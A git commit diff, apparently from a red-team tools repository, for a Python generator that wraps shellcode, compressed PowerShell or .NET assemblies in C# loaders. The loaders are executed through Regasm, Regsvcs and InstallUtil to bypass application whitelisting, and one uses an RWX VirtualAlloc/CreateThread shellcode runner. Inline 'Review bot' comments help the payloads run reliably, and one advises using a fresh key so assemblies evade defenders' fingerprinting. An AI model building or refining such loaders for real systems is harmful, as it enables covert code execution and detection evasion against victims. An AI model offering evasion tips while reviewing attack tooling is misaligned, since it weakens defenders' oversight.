Updated rogue-dot-net

This commit is contained in:
Mariusz B. / mgeeky 2020-05-05 20:22:05 +02:00
parent 1138751330
commit 72c1136fda
12 changed files with 619 additions and 444 deletions


@ -316,7 +316,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter. - [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives. - [**`rogue-dot-net`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/rogue-dot-net) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs**/**InstallUtil** code execution primitives.
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques. - [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
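Review bot: typo in the unchanged context line directly above ("intdended" in the PhishingPost entry, on both sides of the diff) would be worth fixing in the same README touch, since this hunk already edits the neighbouring entry. The renamed entry itself is consistent with the new directory name and with the Regasm/Regsvcs/InstallUtil primitives the new README lists.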


@ -1,78 +0,0 @@
## Rogue .NET Assembly for Regsvcs/Regasm Code Execution
Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:
### Step 1: Generate key.snk file
```
powershell -file build.ps1
```
### Step 2: Generate source code file
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage:
```
python3 generateRegsvcs.py --help
:: Regsvcs Code Execution Source code generation utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
usage: .\generateRegsvcs.py [options] <inputFile>
positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments:
-h, --help show this help message and exit
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
```
Sample use case:
```
python3 generateRegsvcs.py -r notepad64.bin > program.cs
:: Regsvcs Code Execution Source code generation utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode.
```
### Step 3: Compilate library .NET Assembly
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
```
### Step 4: Code execution via Regsvcs or Regasm:
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
```
or
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
```
or
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
```
or
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
```

Binary file not shown.


@ -0,0 +1,90 @@
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
### Step 1: Generate key.snk file
```
powershell -file build.ps1
```
### Step 2: Generate source code file
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage:
```
python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile>
positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments:
-h, --help show this help message and exit
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
```
Sample use case:
```
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode.
```
### Step 3: Compilate library .NET Assembly
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
```
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
- x86:
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
```
- x64:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
```
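Review bot: Step 1 does not work as an isolated first step, because build.ps1 (changed elsewhere in this commit) writes key.snk and then immediately invokes csc.exe on program.cs, which does not exist until Step 2; either split the key generation out of build.ps1 or tell the reader that the csc error at Step 1 is expected. Three smaller points in the same file: "Compilate" in the Step 3 heading should read "Compile"; the two csc commands mix Framework\ and Framework64\ paths, which is harmless for compiling a library but the Step 4 host bitness is not, so the README should state that raw shellcode has to match the architecture of the regasm/regsvcs/InstallUtil binary used (the sample input is notepad64.bin, so the x86 lines under Framework\ will crash with it); and only the /U form is listed for InstallUtil without saying why, namely that the generated Installer class overrides Uninstall only, so `InstallUtil.exe rogue.dll` without /U will not reach the payload.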


@ -1,5 +1,5 @@
$key = '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' $key = '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'
$Content = [System.Convert]::FromBase64String($key) $Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte Set-Content key.snk -Value $Content -Encoding Byte
& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs & "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
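Review bot: the output name here is still /out:regsvcs.dll while the new README, the generator banner and every Step 4 command reference rogue.dll, so a user following the README ends up with two differently named DLLs depending on which path they took; rename it here, or drop the csc line from build.ps1 altogether, since the README's Step 1 only uses this script to produce key.snk and program.cs does not exist yet at that point (the csc call then simply errors). Two portability points: `Set-Content -Encoding Byte` exists only in Windows PowerShell 5.x (PowerShell 6+ replaced it with -AsByteStream), and the hard-coded Framework64 path fails on 32-bit hosts. Finally, the key blob is a fixed, published strong-name key (program.cs credits the original subTee PoC it came with), so every assembly built from this script carries the same public key token and is trivially fingerprintable by defenders; for real engagements the operator should generate a fresh key (`sn.exe -k key.snk`) instead of reusing this one.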


@ -1,360 +1,382 @@
#!/usr/bin/python3 #!/usr/bin/python3
# #
# Red-Teaming script that constructs C# code for Regsvcs code execution technique. # Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
# #
# Step 1: Generate source code file # Step 1: Generate source code file
# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs # cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
# #
# Step 2: Compilate library .NET Assembly # Step 2: Compilate library .NET Assembly
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used # if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). # to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
# Then proper compilation command will be: # Then proper compilation command will be:
# #
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# # Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
# Step 3: Code execution via Regsvcs or Regasm: # x86:
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
# or # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
# or # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
# or
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # x64:
# # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
import re
import os # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
import io # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
import sys
import gzip # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
import base64 # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
import string #
import struct # Mariusz B. / mgeeky, <mb@binary-offensive.com>
import random #
import binascii
import argparse import re
import os
import io
def getCompressedPayload(filePath): import sys
out = io.BytesIO() import gzip
encoded = '' import base64
with open(filePath, 'rb') as f: import string
inp = f.read() import struct
import random
with gzip.GzipFile(fileobj = out, mode = 'w') as fo: import binascii
fo.write(inp) import argparse
encoded = base64.b64encode(out.getvalue())
def getCompressedPayload(filePath):
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( out = io.BytesIO()
encoded.decode() encoded = ''
) with open(filePath, 'rb') as f:
return powershell inp = f.read()
def getSourceFileContents(payload, _format): with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
launchCode = '' fo.write(inp)
usings = ''
encoded = base64.b64encode(out.getvalue())
if _format == 'exe':
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
exeLaunchCode = string.Template(''' encoded.decode()
public static void Execute() { )
return powershell
string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload); def getSourceFileContents(payload, _format):
launchCode = ''
Assembly asm = Assembly.Load(decoded); usings = ''
MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name); if _format == 'exe':
method.Invoke(instance, null);
exeLaunchCode = string.Template('''
}''').safe_substitute( public static void Execute() {
payload2 = base64.b64encode(payload.encode()).decode()
) string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload);
launchCode = exeLaunchCode Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint;
elif _format == 'raw': object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null);
foo = str(binascii.hexlify(payload), 'ascii')
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] }''').safe_substitute(
encodedPayload = ' ' payload2 = base64.b64encode(payload.encode()).decode()
)
for i in range(len(fooarr)):
if i % 16 == 0 and i > 0:
encodedPayload += '\n ' launchCode = exeLaunchCode
encodedPayload += '{}, '.format(fooarr[i])
elif _format == 'raw':
encodedPayload = encodedPayload.strip()[:-1]
foo = str(binascii.hexlify(payload), 'ascii')
shellcodeLoader = string.Template(''' fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
[DllImport("kernel32")] encodedPayload = ' '
private static extern IntPtr VirtualAlloc(
IntPtr lpAddress, UIntPtr dwSize, for i in range(len(fooarr)):
UInt32 flAllocationType, if i % 16 == 0 and i > 0:
UInt32 flProtect encodedPayload += '\n '
); encodedPayload += '{}, '.format(fooarr[i])
[DllImport("kernel32")] encodedPayload = encodedPayload.strip()[:-1]
private static extern bool VirtualFree(
IntPtr lpAddress, shellcodeLoader = string.Template('''
UInt32 dwSize, [DllImport("kernel32")]
UInt32 dwFreeType private static extern IntPtr VirtualAlloc(
); IntPtr lpAddress, UIntPtr dwSize,
UInt32 flAllocationType,
[DllImport("kernel32")] UInt32 flProtect
private static extern IntPtr CreateThread( );
UInt32 lpThreadAttributes,
UInt32 dwStackSize, [DllImport("kernel32")]
IntPtr lpStartAddress, private static extern bool VirtualFree(
IntPtr param, IntPtr lpAddress,
UInt32 dwCreationFlags, UInt32 dwSize,
ref UInt32 lpThreadId UInt32 dwFreeType
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern bool CloseHandle( private static extern IntPtr CreateThread(
IntPtr hHandle UInt32 lpThreadAttributes,
); UInt32 dwStackSize,
IntPtr lpStartAddress,
[DllImport("kernel32")] IntPtr param,
private static extern UInt32 WaitForSingleObject( UInt32 dwCreationFlags,
IntPtr hHandle, ref UInt32 lpThreadId
UInt32 dwMilliseconds );
);
[DllImport("kernel32")]
private static UInt32 MEM_COMMIT = 0x1000; private static extern bool CloseHandle(
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; IntPtr hHandle
private static UInt32 MEM_RELEASE = 0x8000; );
public static void Execute() { [DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
byte[] payload = new byte[$payloadSize] { IntPtr hHandle,
$payload2 UInt32 dwMilliseconds
}; );
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); private static UInt32 MEM_COMMIT = 0x1000;
Marshal.Copy(payload, 0, funcAddr, payload.Length); private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
IntPtr hThread = IntPtr.Zero; private static UInt32 MEM_RELEASE = 0x8000;
UInt32 threadId = 0;
public static void Execute() {
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF); byte[] payload = new byte[$payloadSize] {
$payload2
CloseHandle(hThread); };
VirtualFree(funcAddr, 0, MEM_RELEASE);
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
}''').safe_substitute( Marshal.Copy(payload, 0, funcAddr, payload.Length);
payload2 = encodedPayload, IntPtr hThread = IntPtr.Zero;
payloadSize = len(payload) UInt32 threadId = 0;
)
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
launchCode = shellcodeLoader WaitForSingleObject(hThread, 0xFFFFFFFF);
else: CloseHandle(hThread);
usings += ''' VirtualFree(funcAddr, 0, MEM_RELEASE);
using System.Management.Automation;
using System.Management.Automation.Runspaces; }''').safe_substitute(
''' payload2 = encodedPayload,
powershellLaunchCode = string.Template(''' payloadSize = len(payload)
public static void Execute() { )
byte[] payload = System.Convert.FromBase64String("$payload2"); launchCode = shellcodeLoader
string decoded = System.Text.Encoding.UTF8.GetString(payload);
else:
Runspace runspace = RunspaceFactory.CreateRunspace(); usings += '''
runspace.Open(); using System.Management.Automation;
using System.Management.Automation.Runspaces;
Pipeline pipeline = runspace.CreatePipeline(); '''
pipeline.Commands.AddScript(decoded); powershellLaunchCode = string.Template('''
pipeline.Invoke(); public static void Execute() {
runspace.Close(); byte[] payload = System.Convert.FromBase64String("$payload2");
}''').safe_substitute( string decoded = System.Text.Encoding.UTF8.GetString(payload);
payload2 = base64.b64encode(payload.encode()).decode()
) Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
launchCode = powershellLaunchCode
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
template = string.Template(''' pipeline.Invoke();
using System;
using System.Diagnostics; runspace.Close();
using System.Reflection; }''').safe_substitute(
using System.Runtime.InteropServices; payload2 = base64.b64encode(payload.encode()).decode()
using System.EnterpriseServices; )
$usings
launchCode = powershellLaunchCode
/*
Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com> template = string.Template('''
License: BSD 3-Clause using System;
using System.Diagnostics;
Step 1: Create Your Strong Name Key -> key.snk using System.Reflection;
using System.Runtime.InteropServices;
$key = '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' using System.EnterpriseServices;
$Content = [System.Convert]::FromBase64String($key) $usings
Set-Content key.snk -Value $Content -Encoding Byte
/*
Step 2: Compile source code: Author: Casey Smith, Twitter: @subTee
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause
Step 3: Execute your payload!
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll Step 1: Create Your Strong Name Key -> key.snk
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll $key = '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'
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll $Content = [System.Convert]::FromBase64String($key)
*/ Set-Content key.snk -Value $Content -Encoding Byte
namespace Program Step 2: Compile source code:
{ C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
public class Bypass : ServicedComponent
{ Step 3: Execute your payload!
public Bypass() C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
{ C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
} C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
// This executes if registration is successful */
[ComRegisterFunction]
public static void RegisterClass( string key ) namespace Program
{ {
Shellcode.Execute(); public class Bypass : ServicedComponent
} {
public Bypass()
// This executes if registration fails {
[ComUnregisterFunction] }
public static void UnRegisterClass( string key )
{ // This executes if registration is successful
Shellcode.Execute(); [ComRegisterFunction]
} public static void RegisterClass( string key )
} {
Shellcode.Execute();
public class Shellcode }
{
$launchCode // This executes if registration fails
} [ComUnregisterFunction]
}''').safe_substitute( public static void UnRegisterClass( string key )
launchCode = launchCode, {
usings = usings Shellcode.Execute();
) }
}
return template
[System.ComponentModel.RunInstaller(true)]
def detectFileIsExe(filePath, forced = False): public class ForInstallUtil : System.Configuration.Install.Installer
first1000 = [] {
// This executes during InstallUtil /U invocation
with open(filePath, 'rb') as f: public override void Uninstall(System.Collections.IDictionary savedState)
first1000 = f.read()[:1000] {
Shellcode.Execute();
if not (first1000[0] == 'M' and first1000[1] == 'Z'): }
return False }
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0] public class Shellcode
{
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'): $launchCode
return False }
}''').safe_substitute(
dosStub = "This program cannot be run in DOS mode." launchCode = launchCode,
printables = ''.join([x for x in first1000[0x40:] if x in string.printable]) usings = usings
)
#if not dosStub in printables:
# return False return template
return True
def detectFileIsExe(filePath, forced = False):
first1000 = []
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>') with open(filePath, 'rb') as f:
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') first1000 = f.read()[:1000]
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.') if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False
args = parser.parse_args()
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if args.exe and args.raw:
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n') if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
sys.exit(-1) return False
return args dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
def main(argv):
sys.stderr.write(''' #if not dosStub in printables:
:: Regsvcs Code Execution Source code generation utility # return False
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm. return True
Mariusz B. / mgeeky, <mb@binary-offensive.com>
''') def opts(argv):
if len(argv) < 2: parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
print('Usage: ./generateRegsvcs.py <inputFile>') parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
sys.exit(-1) parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
args = opts(argv)
args = parser.parse_args()
_format = 'powershell'
if args.exe and args.raw:
if args.exe: sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
if not detectFileIsExe(args.inputFile, args.exe): sys.exit(-1)
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
return False return args
_format = 'exe' def main(argv):
sys.stderr.write('[?] File recognized as PE/EXE.\n\n') sys.stderr.write('''
with open(args.inputFile, 'rb') as f: :: Rogue .NET Source Code Generation Utility
payload = f.read() To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
elif args.raw:
_format = 'raw' ''')
sys.stderr.write('[?] File specified as raw Shellcode.\n\n') if len(argv) < 2:
with open(args.inputFile, 'rb') as f: print('Usage: ./generateRogueDotNet.py <inputFile>')
payload = f.read() sys.exit(-1)
else: args = opts(argv)
sys.stderr.write('[?] Powershell code given.\n')
sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n') _format = 'powershell'
sys.stderr.write(' Obtain them from: .\n\n')
if args.exe:
if args.inputFile.endswith('.exe'): if not detectFileIsExe(args.inputFile, args.exe):
return False sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
return False
payload = getCompressedPayload(args.inputFile)
_format = 'exe'
output = getSourceFileContents(payload, _format) sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f:
print(output) payload = f.read()
management = '' elif args.raw:
if _format == 'powershell': _format = 'raw'
management = ' /r:System.Management.Automation.dll' sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
with open(args.inputFile, 'rb') as f:
commands = ''' payload = f.read()
===================================== else:
sys.stderr.write('[+] Powershell code given.\n')
Step 1: Create Your Strong Name Key -> key.snk
if args.inputFile.endswith('.exe'):
$key = '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' return False
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte payload = getCompressedPayload(args.inputFile)
Step 2: Compile source code: output = getSourceFileContents(payload, _format)
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
print(output)
Step 3: Execute your payload!
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll management = ''
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll if _format == 'powershell':
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll management = ' /r:System.Management.Automation.dll'
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
'''.format(management) commands = '''
if 'PROGRAMFILES(X86)' in os.environ: =====================================
commands = commands.replace('Framework', 'Framework64')
Step 1: Create Your Strong Name Key -> key.snk
sys.stderr.write(commands)
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
if __name__ == '__main__': $Content = [System.Convert]::FromBase64String($key)
main(sys.argv) Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code:
